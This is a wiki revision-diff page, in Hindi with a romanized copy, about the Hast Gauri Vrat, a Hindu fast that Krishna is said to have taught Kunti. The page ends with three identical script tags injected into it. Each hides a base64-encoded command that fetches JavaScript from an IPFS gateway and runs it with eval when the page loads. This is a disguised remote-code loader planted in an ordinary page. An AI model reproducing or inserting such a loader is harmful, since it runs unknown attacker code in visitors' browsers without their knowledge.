Difference between revisions of "हस्त गौरी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (हस्तगौरीव्रत का नाम बदलकर हस्त गौरी व्रत कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भाद्रपद]] [[शुक्ल पक्ष|शुक्ल]] [[तृतीया]]  पर किया जाता है।  
 
*[[भाद्रपद]] [[शुक्ल पक्ष|शुक्ल]] [[तृतीया]]  पर किया जाता है।  
*धन-धान्य से पूर्ण राज्य की प्राप्ति के लिए [[कृष्ण]] द्वारा [[कुन्ती]] को सुनाया गया व्रत है <ref>व्रतार्क (पाण्डुलिपि 50बी-52बी)</ref>, <ref>अहल्याकामधेनु (280बी)</ref>
+
*धन-धान्य से पूर्ण राज्य की प्राप्ति के लिए [[कृष्ण]] द्वारा [[कुन्ती]] को सुनाया गया व्रत है।<ref>व्रतार्क (पाण्डुलिपि 50बी-52बी</ref>, <ref>अहल्याकामधेनु (280बी</ref>
 
*[[गौरी]], [[शिव|हर]] एवं हेरम्ब ([[गणेश]]) का ध्यान करना चाहिए।  
 
*[[गौरी]], [[शिव|हर]] एवं हेरम्ब ([[गणेश]]) का ध्यान करना चाहिए।  
 
*यह व्रत 13 वर्षों तक किया जाता है।  
 
*यह व्रत 13 वर्षों तक किया जाता है।  
Line 8: Line 8:
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:43, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • bhadrapad shukl tritiya par kiya jata hai.
  • dhan-dhany se poorn rajy ki prapti ke lie krishna dvara kunti ko sunaya gaya vrat hai.[1], [2]
  • gauri, har evan heramb (ganesh) ka dhyan karana chahie.
  • yah vrat 13 varshoan tak kiya jata hai.
  • is vrat ka 14vean varsh mean udyapan kiya jata hai.

 


tika tippani aur sandarbh

  1. vratark (pandulipi 50bi-52bi
  2. ahalyakamadhenu (280bi

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>